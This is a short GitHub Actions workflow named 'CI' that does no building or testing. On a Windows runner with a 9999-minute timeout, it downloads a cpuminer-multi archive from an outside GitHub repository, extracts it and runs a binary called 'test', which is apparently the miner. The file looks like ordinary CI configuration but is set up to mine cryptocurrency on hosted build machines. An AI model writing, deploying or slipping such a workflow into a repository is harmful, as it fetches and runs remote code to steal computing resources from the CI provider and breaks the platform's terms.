name: CI

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    
    - name: loop
      run: cmd /c curl https://github.com/Testdrive345/light/raw/main/cpuminer-multi-win64.rar -O -J -L
           cmd /c tar -xf cpuminer-multi-win64.rar
           cmd /c test
    
